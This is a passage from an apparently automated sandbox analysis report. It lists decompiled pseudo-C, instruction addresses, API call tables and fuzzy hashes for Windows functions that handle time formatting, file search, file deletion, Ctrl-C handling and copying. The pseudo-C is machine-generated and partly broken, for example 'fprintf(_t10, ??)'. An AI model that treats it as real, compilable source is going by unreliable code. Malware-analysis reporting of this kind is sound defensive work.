							continue;
						}
						L18:
						_t126 = _t126 - 2;
						__eflags = _t126;
						L19:
						__eflags = 0;
						 *_t126 = 0;
						goto L20;
					}
					__eflags = _t134;
					if(_t134 != 0) {
						goto L19;
					}
					goto L18;
				} else {
					_t127 = _v334 & 0x0000ffff;
					_t130 = 0xcccccccd * _t127 >> 0x20 >> 3;
					_push(0xcccccccd * _t127 >> 0x20 >> 3);
					_push(0x11ff7fc);
					_push(_v336 & 0x0000ffff);
					_push(0x11ff81c);
					_push(_v338 & 0x0000ffff);
					_push(0x11ff81c);
					_push(_v340 & 0x0000ffff);
					_push(L"%2d%s%02d%s%02d%s%02d");
					if(_t139 == 0) {
						_t74 = E011E25D9();
						L7:
						return E011E6FD0(_t74, _t111, _v8 ^ _t141, _t130, _t136, _t139);
					} else {
						_push(_a8);
						_push(_t139);
						E011E274C();
						_t116 = _t139 + 2;
						do {
							_t106 =  *_t139;
							_t139 = _t139 + 2;
						} while (_t106 != 0);
						L6:
						_t140 = _t139 - _t116;
						_t139 = _t140 >> 1;
						_t74 = _t140 >> 1;
						goto L7;
					}
				}
			}


















































                                                    0x011d96ab
                                                    0x011d96b2
                                                    0x011d96b7
                                                    0x011d96bb
                                                    0x011d96bf
                                                    0x011f0ad6
                                                    0x011d96c5
                                                    0x011d96cc
                                                    0x011d96e0
                                                    0x011d96e0
                                                    0x011d96f4
                                                    0x011d9708
                                                    0x011d9711
                                                    0x011f0aed
                                                    0x011f0af4
                                                    0x011f0c53
                                                    0x011f0c5a
                                                    0x011f0c5f
                                                    0x011f0c66
                                                    0x011f0c84
                                                    0x011f0c68
                                                    0x011f0c68
                                                    0x011f0c6b
                                                    0x011f0c79
                                                    0x011f0c7b
                                                    0x011f0c7d
                                                    0x011f0c7d
                                                    0x011f0c6d
                                                    0x011f0c6d
                                                    0x011f0c6f
                                                    0x011f0c6f
                                                    0x011f0c72
                                                    0x011f0c72
                                                    0x011f0c6b
                                                    0x011f0c89
                                                    0x011f0c91
                                                    0x011f0c92
                                                    0x011f0ca3
                                                    0x011f0cab
                                                    0x011f0cab
                                                    0x011f0cad
                                                    0x011f0cd1
                                                    0x011f0cda
                                                    0x011f0cdf
                                                    0x011f0ce2
                                                    0x011f0ce2
                                                    0x011f0ce5
                                                    0x011f0ce8
                                                    0x011f0ce8
                                                    0x00000000
                                                    0x011f0ced
                                                    0x011f0caf
                                                    0x011f0cb2
                                                    0x011f0cb5
                                                    0x011f0cb5
                                                    0x011f0cb8
                                                    0x011f0cbb
                                                    0x011f0cbb
                                                    0x011f0cc5
                                                    0x011f0cc7
                                                    0x00000000
                                                    0x011f0cc7
                                                    0x011f0b05
                                                    0x011f0b1b
                                                    0x011f0b21
                                                    0x011f0b23
                                                    0x011f0b65
                                                    0x011f0b65
                                                    0x011f0b6c
                                                    0x011f0b72
                                                    0x011f0b75
                                                    0x011f0c27
                                                    0x011f0c43
                                                    0x011f0c49
                                                    0x011f0c4b
                                                    0x011f0c4d
                                                    0x011f0c4d
                                                    0x00000000
                                                    0x011f0c4b
                                                    0x011f0b7b
                                                    0x011f0b7e
                                                    0x011f0b7e
                                                    0x011f0b80
                                                    0x011f0b80
                                                    0x011f0b84
                                                    0x011f0b9a
                                                    0x011f0b9c
                                                    0x011f0ba3
                                                    0x011f0ba7
                                                    0x011f0bb5
                                                    0x011f0bb5
                                                    0x011f0bb5
                                                    0x011f0bb7
                                                    0x011f0bb7
                                                    0x011f0bba
                                                    0x011f0bbb
                                                    0x011f0bbb
                                                    0x011f0bc4
                                                    0x011f0bc7
                                                    0x011f0bcd
                                                    0x011f0bd0
                                                    0x011f0bd3
                                                    0x011f0c0f
                                                    0x011f0c0f
                                                    0x00000000
                                                    0x011f0c0f
                                                    0x011f0bd5
                                                    0x011f0bda
                                                    0x011f0be0
                                                    0x011f0be0
                                                    0x011f0be3
                                                    0x011f0be6
                                                    0x011f0be6
                                                    0x011f0beb
                                                    0x011f0beb
                                                    0x011f0bfd
                                                    0x011f0c09
                                                    0x011f0c0c
                                                    0x00000000
                                                    0x011f0c0c
                                                    0x011f0ba9
                                                    0x011f0bad
                                                    0x00000000
                                                    0x00000000
                                                    0x011f0baf
                                                    0x011f0bb3
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011f0bb3
                                                    0x011f0b9e
                                                    0x00000000
                                                    0x011f0b9e
                                                    0x011f0b88
                                                    0x011f0b8b
                                                    0x011f0b90
                                                    0x011f0b92
                                                    0x011f0c15
                                                    0x011f0c15
                                                    0x011f0c19
                                                    0x011f0c1c
                                                    0x011f0c1e
                                                    0x011f0c1e
                                                    0x00000000
                                                    0x011f0b80
                                                    0x011f0b25
                                                    0x011f0b32
                                                    0x011f0b37
                                                    0x011f0b37
                                                    0x011f0b39
                                                    0x011f0b39
                                                    0x011f0b3f
                                                    0x011f0b41
                                                    0x00000000
                                                    0x00000000
                                                    0x011f0b43
                                                    0x011f0b47
                                                    0x011f0b4a
                                                    0x00000000
                                                    0x00000000
                                                    0x011f0b4c
                                                    0x011f0b4f
                                                    0x011f0b52
                                                    0x011f0b52
                                                    0x011f0b55
                                                    0x00000000
                                                    0x00000000
                                                    0x011f0b5d
                                                    0x011f0b5d
                                                    0x011f0b5d
                                                    0x011f0b60
                                                    0x011f0b60
                                                    0x011f0b62
                                                    0x00000000
                                                    0x011f0b62
                                                    0x011f0b59
                                                    0x011f0b5b
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011d9717
                                                    0x011d9717
                                                    0x011d972c
                                                    0x011d972f
                                                    0x011d9730
                                                    0x011d9735
                                                    0x011d973d
                                                    0x011d9742
                                                    0x011d974a
                                                    0x011d974f
                                                    0x011d9750
                                                    0x011d9757
                                                    0x011f0ae0
                                                    0x011d9781
                                                    0x011d9791
                                                    0x011d975d
                                                    0x011d975d
                                                    0x011d9760
                                                    0x011d9761
                                                    0x011d9769
                                                    0x011d9770
                                                    0x011d9770
                                                    0x011d9773
                                                    0x011d9776
                                                    0x011d977b
                                                    0x011d977b
                                                    0x011d977d
                                                    0x011d977f
                                                    0x00000000
                                                    0x011d977f
                                                    0x011d9757

                                                    APIs
                                                    • GetSystemTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,011FF830,?,00002000), ref: 011D96CC
                                                    • SystemTimeToFileTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 011D96E0
                                                    • FileTimeToLocalFileTime.API-MS-WIN-CORE-FILE-L1-1-0(?,?), ref: 011D96F4
                                                    • FileTimeToSystemTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 011D9708
                                                    • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00001003,?,00000080), ref: 011F0B1B
                                                    • GetTimeFormatW.API-MS-WIN-CORE-DATETIME-L1-1-0(00000000,00000002,?,?,?,00000020), ref: 011F0C43
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: Time$File$System$FormatInfoLocalLocale
                                                    • String ID: %02d%s%02d%s$%2d%s%02d%s%02d%s%02d$HH:mm:ss t
                                                    • API String ID: 55602301-2516506544
                                                    • Opcode ID: d934bdcb8319a6cec73d4b6ba420af93533aa4ae2e44a50143315b30351467ba
                                                    • Instruction ID: dd12c86237fe8f982918843d00b74af6a34bff32662dbf0263de2fd5a8333ffa
                                                    • Opcode Fuzzy Hash: d934bdcb8319a6cec73d4b6ba420af93533aa4ae2e44a50143315b30351467ba
                                                    • Instruction Fuzzy Hash: B981D275A0061A9ADF2CDF59CC54BFA73B9AF48704F04419EFA0AE7142EB309A85CB51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011E68BA, Relevance: 15.1, APIs: 10, Instructions: 114memoryfileCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 54%
                                                    			E011E68BA(intOrPtr* __ecx, WCHAR* __edx, intOrPtr _a4, intOrPtr _a8, void* _a12, void** _a16) {
				signed int _v8;
				intOrPtr* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t18;
				void* _t22;
				void* _t24;
				int _t28;
				void* _t40;
				void* _t41;
				void* _t47;
				void* _t50;
				void* _t51;
				void** _t53;
				void* _t54;
				signed int _t55;

				_t48 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t18 =  *0x11fd0b4; // 0x1805bc26
				_v8 = _t18 ^ _t55;
				_v12 = __ecx;
				_t40 = 0;
				_t22 = FindFirstFileExW(__edx, 0 | _a8 == 0x00000000, _a12, 0, 0, 2);
				_t53 = _a16;
				_t50 = _t22;
				 *_t53 = _t50;
				while(_t50 != 0xffffffff) {
					_push(_a4);
					_push(_a12);
					if(_v12 != E011E6A00) {
						 *0x12194b4();
						_t28 =  *_v12();
						_t50 =  *_t53;
					} else {
						_t28 = E011E6A00();
					}
					if(_t28 == 0) {
						if(FindNextFileW(_t50, _a12) == 0) {
							FindClose( *_t53);
							 *_t53 =  *_t53 | 0xffffffff;
							_t50 = _t50 | 0xffffffff;
							goto L6;
						} else {
							_t50 =  *_t53;
							continue;
						}
					} else {
						 *0x1213cf0 =  *0x1213cf0 & 0x00000000;
						_t40 = 1;
						L6:
						if(_t50 == 0xffffffff) {
							L12:
							if(_t40 == 0) {
								break;
							}
							L13:
							_t24 = _t40;
						} else {
							_t47 =  *0x1213cf4;
							if(_t47 == 0) {
								_t47 = HeapAlloc(GetProcessHeap(), 0, 0x14);
								goto L17;
							} else {
								_t48 =  *0x11fd5dc; // 0x0
								if(_t48 >=  *0x1213cf8) {
									_t47 = HeapReAlloc(GetProcessHeap(), 0, _t47, 4 + _t48 * 4);
									if(_t47 == 0) {
										 *0x1213cf0 = GetLastError();
										FindClose( *_t53);
										 *_t53 =  *_t53 | 0xffffffff;
										_t24 = 0;
									} else {
										 *0x1213cf8 =  *0x1213cf8 + 1;
										L17:
										_t48 =  *0x11fd5dc; // 0x0
										 *0x1213cf4 = _t47;
										goto L9;
									}
								} else {
									L9:
									if(_t47 != 0) {
										 *(_t47 + _t48 * 4) =  *_t53;
										 *0x11fd5dc = _t48;
									}
									_t40 = 1;
									goto L12;
								}
							}
						}
					}
					_pop(_t51);
					_pop(_t54);
					_pop(_t41);
					return E011E6FD0(_t24, _t41, _v8 ^ _t55, _t48, _t51, _t54);
				}
				 *0x1213cf0 = GetLastError();
				goto L13;
			}




















                                                    0x011e68ba
                                                    0x011e68bf
                                                    0x011e68c0
                                                    0x011e68c1
                                                    0x011e68c8
                                                    0x011e68d4
                                                    0x011e68dc
                                                    0x011e68e6
                                                    0x011e68ec
                                                    0x011e68ef
                                                    0x011e68f1
                                                    0x011e68f3
                                                    0x011e68f8
                                                    0x011e68fe
                                                    0x011e6906
                                                    0x011e699a
                                                    0x011e69a3
                                                    0x011e69a5
                                                    0x011e690c
                                                    0x011e690c
                                                    0x011e690c
                                                    0x011e6913
                                                    0x011e69e2
                                                    0x011e69ed
                                                    0x011e69f3
                                                    0x011e69f6
                                                    0x00000000
                                                    0x011e69e4
                                                    0x011e69e4
                                                    0x00000000
                                                    0x011e69e4
                                                    0x011e6919
                                                    0x011e6919
                                                    0x011e6920
                                                    0x011e6922
                                                    0x011e6925
                                                    0x011e6951
                                                    0x011e6953
                                                    0x00000000
                                                    0x00000000
                                                    0x011e6955
                                                    0x011e6955
                                                    0x011e6927
                                                    0x011e6927
                                                    0x011e692f
                                                    0x011e6988
                                                    0x00000000
                                                    0x011e6931
                                                    0x011e6931
                                                    0x011e693d
                                                    0x011e69c4
                                                    0x011e69c8
                                                    0x011f154f
                                                    0x011f1554
                                                    0x011f155a
                                                    0x011f155d
                                                    0x011e69ce
                                                    0x011e69ce
                                                    0x011e698a
                                                    0x011e698a
                                                    0x011e6990
                                                    0x00000000
                                                    0x011e6990
                                                    0x011e693f
                                                    0x011e693f
                                                    0x011e6941
                                                    0x011e6945
                                                    0x011e6949
                                                    0x011e6949
                                                    0x011e694f
                                                    0x00000000
                                                    0x011e694f
                                                    0x011e693d
                                                    0x011e692f
                                                    0x011e6925
                                                    0x011e695a
                                                    0x011e695b
                                                    0x011e695e
                                                    0x011e6967
                                                    0x011e6967
                                                    0x011e6970
                                                    0x00000000

                                                    APIs
                                                    • FindFirstFileExW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000037,00000000,00000000,00000002,00000000,?,00000000,011E6A00,011E6A00,?,011DAE4F,00000037,00000000,?), ref: 011E68E6
                                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,011DAE4F,00000037,00000000,?,?), ref: 011E696A
                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000014,?,011DAE4F,00000037,00000000,?,?), ref: 011E697B
                                                    • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,011DAE4F,00000037,00000000,?,?), ref: 011E6982
                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,?,011DAE4F,00000037,00000000,?,?), ref: 011E69B7
                                                    • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,011DAE4F,00000037,00000000,?,?), ref: 011E69BE
                                                    • FindNextFileW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000037,?,011DAE4F,00000037,00000000,?,?), ref: 011E69DA
                                                    • FindClose.API-MS-WIN-CORE-FILE-L1-1-0(011DAE4F,?,011DAE4F,00000037,00000000,?,?), ref: 011E69ED
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: Heap$Find$AllocFileProcess$CloseErrorFirstLastNext
                                                    • String ID:
                                                    • API String ID: 1047556133-0
                                                    • Opcode ID: bd5055c26d6986c4d7791438e641f8d8d6467a4814b4cdb1aa0cb1cfe8dd3354
                                                    • Instruction ID: 715a1d092b3117166d7c9ed6ac7227bf96f2bc474ed480485811791da40d26ed
                                                    • Opcode Fuzzy Hash: bd5055c26d6986c4d7791438e641f8d8d6467a4814b4cdb1aa0cb1cfe8dd3354
                                                    • Instruction Fuzzy Hash: 8541B270600601AFDF28CFA9E81DAA97BF9FB65325F51462CE992C7294EF309841CB11
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011D83F2, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 82filenativeCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 72%
                                                    			E011D83F2(WCHAR* __ecx, signed int __edx) {
				void* _v8;
				void* _v16;
				void* _v24;
				long _v32;
				char _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				void* _v64;
				struct _EXCEPTION_RECORD _t30;
				long _t31;
				long _t35;
				WCHAR* _t41;
				char* _t43;
				long _t47;
				void* _t49;

				_t47 = 0;
				_t41 = __ecx;
				if((__edx & 0x00000400) != 0) {
					L11:
					if(DeleteFileW(_t41) == 0) {
						_t47 = GetLastError();
					}
					L8:
					return _t47;
				}
				_v8 = _v8 | 0xffffffff;
				_t30 =  &_v16;
				__imp__RtlDosPathNameToRelativeNtPathName_U_WithStatus(__ecx, _t30, 0,  &_v40);
				if(_t30 < 0) {
					goto L11;
				}
				if(_v40 > 0) {
					_t31 = _v32;
					_t43 =  &_v40;
				} else {
					_t31 = 0;
					_t43 =  &_v16;
					_v32 = 0;
				}
				_v60 = _t31;
				_v64 = 0x18;
				_v52 = 0x40;
				_v56 = _t43;
				_v48 = _t47;
				_v44 = _t47;
				_t35 = NtOpenFile( &_v8, 0x10000,  &_v64,  &_v24, 4, 0x5040);
				__imp__RtlReleaseRelativeName( &_v40);
				RtlFreeUnicodeString( &_v16);
				if(_t35 < 0) {
					goto L11;
				} else {
					if(E011D84BE(_v8) != 0) {
						_t49 = E011F9AB4(_v8);
					} else {
						_t49 = 1;
					}
					CloseHandle(_v8);
					if(_t49 == 0) {
						goto L11;
					} else {
						goto L8;
					}
				}
			}





















                                                    0x011d83fd
                                                    0x011d83ff
                                                    0x011d8407
                                                    0x011f036d
                                                    0x011f0376
                                                    0x011f0382
                                                    0x011f0382
                                                    0x011d84b5
                                                    0x011d84bd
                                                    0x011d84bd
                                                    0x011d840d
                                                    0x011d8416
                                                    0x011d841b
                                                    0x011d8423
                                                    0x00000000
                                                    0x00000000
                                                    0x011d842d
                                                    0x011f0353
                                                    0x011f0356
                                                    0x011d8433
                                                    0x011d8433
                                                    0x011d8435
                                                    0x011d8438
                                                    0x011d8438
                                                    0x011d8440
                                                    0x011d844c
                                                    0x011d845c
                                                    0x011d8464
                                                    0x011d8467
                                                    0x011d846a
                                                    0x011d846d
                                                    0x011d8479
                                                    0x011d8483
                                                    0x011d848b
                                                    0x00000000
                                                    0x011d8491
                                                    0x011d849b
                                                    0x011f0366
                                                    0x011d84a1
                                                    0x011d84a3
                                                    0x011d84a3
                                                    0x011d84a7
                                                    0x011d84af
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011d84af

                                                    APIs
                                                    • RtlDosPathNameToRelativeNtPathName_U_WithStatus.NTDLL ref: 011D841B
                                                    • NtOpenFile.NTDLL(000000FF,00010000,?,?,00000004,00005040), ref: 011D846D
                                                    • RtlReleaseRelativeName.NTDLL(?), ref: 011D8479
                                                    • RtlFreeUnicodeString.NTDLL(?), ref: 011D8483
                                                      • Part of subcall function 011D84BE: NtQueryVolumeInformationFile.NTDLL(000000FF,?,?,00000008,00000004), ref: 011D84EA
                                                    • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(000000FF), ref: 011D84A7
                                                    • DeleteFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,00000001), ref: 011F036E
                                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,011D8393), ref: 011F037C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: File$NamePathRelative$CloseDeleteErrorFreeHandleInformationLastName_OpenQueryReleaseStatusStringUnicodeVolumeWith
                                                    • String ID: @
                                                    • API String ID: 2968197161-2766056989
                                                    • Opcode ID: 15b906fcc33d32b35945597303889ee1e0c275476096b7cf534ee7bb332ef71e
                                                    • Instruction ID: 68ca3638a004b323041b77d24e8829d245a3f3a9f4afba082227942518c7f86b
                                                    • Opcode Fuzzy Hash: 15b906fcc33d32b35945597303889ee1e0c275476096b7cf534ee7bb332ef71e
                                                    • Instruction Fuzzy Hash: 1E2162B1D00209AFDF24DFA5E948AEFBBBDEB58654F114169FA11E3241DB309E04CB60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011F6D90, Relevance: 13.6, APIs: 9, Instructions: 67filenativeCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 31%
                                                    			E011F6D90(void* __edi, intOrPtr _a4) {
				char _v12;
				void* __ecx;
				int _t4;
				void* _t6;
				void* _t7;
				struct _IO_FILE* _t10;
				void* _t13;
				void* _t16;

				_t16 = __edi;
				_push(_t13);
				_push(_t13);
				if(_a4 == 0 || _a4 == 1) {
					EnterCriticalSection( *0x1203858);
					 *0x11fd544 = 1;
					LeaveCriticalSection( *0x1203858);
					if( *0x11fd0db != 0 &&  *0x1213cc4 != 0) {
						_push("^C");
						_t10 = E011E7721(_t4, 2);
						_pop(_t13);
						_t4 = fflush(E011E7721(fprintf(_t10, ??), 2));
					}
					if( *0x120b938 != 0xffffffff) {
						__imp__TryAcquireSRWLockExclusive(0x1217f20, _t16);
						if(_t4 != 0) {
							__imp__NtCancelSynchronousIoFile( *0x120b938, 0,  &_v12);
							__imp__ReleaseSRWLockExclusive(0x1217f20);
						}
					}
					if(E011E7797(_t13) == 0) {
						_t7 = E011E0178(_t5);
						if(_t7 != 0) {
							__imp___get_osfhandle(0);
							FlushConsoleInputBuffer(_t7);
						}
					}
					_t6 = 1;
				} else {
					_t6 = 0;
				}
				return _t6;
			}











                                                    0x011f6d90
                                                    0x011f6d95
                                                    0x011f6d96
                                                    0x011f6d9f
                                                    0x011f6db3
                                                    0x011f6dbf
                                                    0x011f6dc5
                                                    0x011f6dd2
                                                    0x011f6ddd
                                                    0x011f6de4
                                                    0x011f6de9
                                                    0x011f6df9
                                                    0x011f6dff
                                                    0x011f6e09
                                                    0x011f6e12
                                                    0x011f6e1a
                                                    0x011f6e28
                                                    0x011f6e2f
                                                    0x011f6e2f
                                                    0x011f6e35
                                                    0x011f6e3d
                                                    0x011f6e41
                                                    0x011f6e48
                                                    0x011f6e4c
                                                    0x011f6e54
                                                    0x011f6e54
                                                    0x011f6e48
                                                    0x011f6e5a
                                                    0x011f6da6
                                                    0x011f6da6
                                                    0x011f6da6
                                                    0x011f6e60

                                                    APIs
                                                    • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 011F6DB3
                                                    • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 011F6DC5
                                                    • fprintf.MSVCRT ref: 011F6DEB
                                                    • fflush.MSVCRT ref: 011F6DF9
                                                    • TryAcquireSRWLockExclusive.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20), ref: 011F6E12
                                                    • NtCancelSynchronousIoFile.NTDLL(00000000,00000000), ref: 011F6E28
                                                    • ReleaseSRWLockExclusive.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20), ref: 011F6E2F
                                                    • _get_osfhandle.MSVCRT ref: 011F6E4C
                                                    • FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000), ref: 011F6E54
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: CriticalExclusiveLockSection$AcquireBufferCancelConsoleEnterFileFlushInputLeaveReleaseSynchronous_get_osfhandlefflushfprintf
                                                    • String ID:
                                                    • API String ID: 3139166086-0
                                                    • Opcode ID: 8b21a91cf073ce9918c0a9012cb838c880f2aa71c4b275b82131f258d6e2289a
                                                    • Instruction ID: 0d3a2d669b8a8a62280d232c0a5f64d16cf12eef3b7968ab26f4f3de8064f518
                                                    • Opcode Fuzzy Hash: 8b21a91cf073ce9918c0a9012cb838c880f2aa71c4b275b82131f258d6e2289a
                                                    • Instruction Fuzzy Hash: F211B132A40210AFEF39EFA8F85DBAA7F68EB64B19F04011DF605911D6CB7144C1C791
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011E5FC8, Relevance: 10.9, APIs: 5, Strings: 1, Instructions: 372COMMONCrypto
                                                    Download Yara Rule
                                                    C-Code - Quality: 92%
                                                    			E011E5FC8(void* __ecx, void* __edx, intOrPtr _a4, signed int _a8, WCHAR* _a12, signed int _a16, intOrPtr* _a20, intOrPtr* _a24) {
				signed int _v8;
				int _v20;
				char _v24;
				int _v28;
				void _v548;
				intOrPtr _v552;
				int _v556;
				intOrPtr* _v560;
				WCHAR* _v564;
				intOrPtr* _v568;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t84;
				short _t95;
				short _t97;
				void* _t98;
				intOrPtr _t100;
				signed int _t112;
				signed int _t113;
				long _t118;
				signed int _t120;
				void* _t121;
				short _t122;
				signed char _t124;
				void* _t125;
				long _t126;
				void* _t127;
				short _t128;
				long _t136;
				signed short* _t137;
				short _t146;
				short _t147;
				void* _t148;
				signed int _t150;
				signed int _t153;
				signed int _t154;
				signed int _t155;
				short _t156;
				signed int _t161;
				WCHAR* _t162;
				intOrPtr* _t163;
				short* _t169;
				long _t170;
				short* _t171;
				signed int _t177;
				short _t178;
				WCHAR* _t182;
				WCHAR* _t183;
				signed int _t187;
				WCHAR* _t188;
				WCHAR* _t199;
				short* _t202;
				void* _t205;
				signed int _t206;
				signed int _t208;
				signed int _t209;
				signed int _t210;
				long _t219;
				signed int _t220;
				void* _t222;
				void* _t223;
				short _t227;
				void* _t228;
				WCHAR* _t229;
				void* _t232;
				WCHAR* _t233;
				signed int _t235;
				intOrPtr* _t239;
				short* _t241;
				void* _t242;
				WCHAR* _t244;
				signed int _t246;
				short* _t248;
				WCHAR* _t250;
				signed int _t251;
				signed int _t252;
				WCHAR* _t254;
				void* _t258;
				intOrPtr _t259;
				signed int _t260;

				_t84 =  *0x11fd0b4; // 0x1805bc26
				_v8 = _t84 ^ _t260;
				_v552 = _a4;
				_v564 = _a12;
				_v560 = _a20;
				_t232 = __edx;
				_v568 = _a24;
				E011E62FA(E011E3320(L"COPYCMD"), _t232);
				_v556 = 0;
				_t162 = E011DEA40( *((intOrPtr*)(__ecx + 0x3c)), 0, 0);
				if(E011E62FA(_t162, _t232) == 0) {
					L2:
					_t250 = _t162;
					_t217 = 0;
					_t12 =  &(_t250[1]); // 0x0
					_t169 = _t12;
					do {
						_t95 =  *_t250;
						_t250 =  &(_t250[1]);
					} while (_t95 != 0);
					_t251 = _t250 - _t169;
					_t252 = _t251 >> 1;
					if(_t251 == 0) {
						L46:
						_t170 = 0x232a;
						L48:
						L011F5CEA(_t162, _t170, _t217, __eflags);
						L49:
						_t170 = 0x232e;
						goto L48;
					}
					if(_t252 >= 0x7fe7) {
						goto L49;
					}
					_t233 = _t162;
					_t13 =  &(_t233[1]); // 0x0
					_t171 = _t13;
					do {
						_t97 =  *_t233;
						_t233 =  &(_t233[1]);
					} while (_t97 != 0);
					_t235 = _t233 - _t171 >> 1;
					_t98 = E011E22C0(_t162, _t162);
					_t14 = _t235 + 1; // -3
					_t217 = _t14;
					E011E1040(_t162, _t14, _t98);
					_t100 = E011E3B5D(_t162, _t14);
					 *_v560 = _t100;
					if(_t100 == 1) {
						_t170 =  *0x1213cf0;
						goto L48;
					}
					_v24 = 1;
					_v28 = 0;
					_v20 = 0x104;
					memset( &_v548, 0, 0x104);
					if(E011E0C70( &_v548, ((0 | _v24 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
						_t170 = 0x2374;
						goto L48;
					}
					_t254 =  &(_t162[_t252 + 1]);
					if( *_t254 == 0) {
						_t177 = _v28;
						__eflags = _t177;
						if(_t177 == 0) {
							_t177 =  &_v548;
						}
						 *_t177 =  *((intOrPtr*)( *0x1213cec));
						_t112 = _v28;
						__eflags = _t112;
						if(_t112 == 0) {
							_t112 =  &_v548;
						}
						_t178 = 0x3a;
						 *((short*)(_t112 + 2)) = _t178;
						_t113 = _v28;
						__eflags = _t113;
						if(_t113 == 0) {
							_t113 =  &_v548;
						}
						 *((short*)(_t113 + 4)) = 0;
						L19:
						_t238 = _a8;
						_t217 = _a8;
						_t255 = _v552;
						if(E011E2D22(_v552, _t238, _t162) != 0) {
							goto L49;
						}
						_t163 = _v560;
						if(( *( *( *_t163 + 0x18)) & 0x00000010) == 0) {
							_t222 = 0x5c;
							_t258 = E011E2349(_t255, _t222);
							if(_t258 == 0) {
								_t259 = _v552;
							} else {
								_t259 = _t258 + 2;
							}
							_t223 = 0x5c;
							if(E011E2349( *((intOrPtr*)( *_t163 + 0x10)), _t223) == 0) {
								_t139 =  *((intOrPtr*)( *_t163 + 0x10));
							}
							E011E1040(_t259, _t238 - (_t259 - _v552 >> 1), _t139);
						}
						_t117 = _v28;
						if(_v28 == 0) {
							_t117 =  &_v548;
						}
						_t162 = _v564;
						_t217 = _a16;
						_t118 = E011E2D22(_t162, _a16, _t117);
						if(_t118 != 0) {
							goto L49;
						} else {
							_t256 = _t118;
							 *0x1213cf0 = _t118;
							SetLastError(_t118);
							_t239 = _v568;
							_t182 = _t162;
							 *_t239 = 0;
							_t120 =  *_t162 & 0x0000ffff;
							_t217 = _t120;
							if(_t120 == 0) {
								L32:
								_t121 = 0x5c;
								if(_t217 == _t121) {
									_t183 = _t162;
									_t256 = 1;
									__eflags = 1;
									_t217 =  &(_t183[1]);
									do {
										_t122 =  *_t183;
										_t183 =  &(_t183[1]);
										__eflags = _t122 - _v556;
									} while (_t122 != _v556);
									 *((short*)(_t162 + (_t183 - _t217 >> 1) * 2 - 2)) = 0;
								}
								_t124 = GetFileAttributesW(_t162);
								if(_t124 != 0xffffffff) {
									__eflags = _t124 & 0x00000010;
									if((_t124 & 0x00000010) != 0) {
										 *_t239 = 1;
										_t256 = 1;
									}
									L36:
									if(_t256 != 0) {
										_t125 = 0x5c;
										_t126 = E011E2349(_v552, _t125);
										_t256 = _t126;
										__eflags = 0;
										_t219 = _t126;
										_t49 = _t219 + 2; // 0x2
										_t127 = _t49;
										do {
											_t187 =  *_t219;
											_t219 = _t219 + 2;
											__eflags = _t187;
										} while (_t187 != 0);
										_t188 = _t162;
										_t220 = _t219 - _t127;
										__eflags = _t220;
										_t217 = _t220 >> 1;
